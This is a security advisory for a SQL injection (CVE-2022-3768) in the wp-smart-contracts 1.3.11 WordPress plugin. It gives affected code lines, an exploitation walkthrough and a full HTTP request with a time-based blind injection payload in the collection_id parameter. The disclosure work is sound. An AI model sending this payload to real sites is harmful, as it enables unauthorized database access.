wp-smart-contracts 1.3.11 WordPress plug-in SQL injection
Vulnerability Metadata
Key | Value |
---|---|
Date of Disclosure | November 07 2022 |
Affected Software | wp-smart-contracts |
Affected Software Type | WordPress plugin |
Version | 1.3.11 |
Weakness | SQL Injection |
CWE ID | CWE-89 |
CVE ID | CVE-2022-3768 |
CVSS 3.x Base Score | 8.8 |
CVSS 2.0 Base Score | n/a |
Reporter | Kunal Sharma, Daniel Krohmer |
Reporter Contact | k_sharma19@informatik.uni-kl.de |
Link to Affected Software | https://wordpress.org/plugins/wp-smart-contracts/ |
Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-3768 |
Vulnerability Description
The collection_id
GET query parameter in wp-smart-contracts 1.3.11 is vulnerable to SQL injection. An attacker with role of Author
or above may abuse the final step of Bulk Minting functionality in wpsc-bulk-mint.php
. This leads to a threat actor crafting a malicious GET request.
Exploitation Guide
Login as user with Author
role or above. This attack requires at least Author
privileges.
Go to Batch Mint NFTs
under Smart Contracts Wizards
option on the WordPress site dashboard.
Clicking Batch Mint NFTs
triggers the vulnerable request.
The request needs to be modified by adding step
, collection_id
and uid
. Here collection_id
is the vulnerable query parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by un-sanitized user input of collection_id
at line 651
in ./classes/wpsc-bulk-mint.php
.
Furthermore, a call to WPSC_Queries::nftERC1155Collections
at 666
in ./classes/wpsc-bulk-mint.php
.
At line 32
in ./classes/wpsc-queries.php
subsequent call to WPSC_Queries::nftCollections
is made.
At lines 54-56
in ./classes/wpsc-queries.php
the database query call on $cond
leads to SQL injection.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below:
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(4)))hlAf)&uid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/
Connection: close
Cookie: notice_hide_1_3_10=true; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_c9db569cb388e160e4b86ca1ddff84d7=tristian%7C1666737503%7CLrfm3tSfh5kthbnUFaHDaj6U4ZWZtZiRs76VMuwj11m%7C0b981aaa64eb6981822a62ae00f04fae8ddd7de70341e86d4ef9ca2869e1a887; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=tristian%7C1666737503%7CLrfm3tSfh5kthbnUFaHDaj6U4ZWZtZiRs76VMuwj11m%7C6cbaecf3b7240c32eb71ffedc809d75ef3d1ab25f5f44e17ba783a8155745385; wp-settings-time-5=1666564746
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1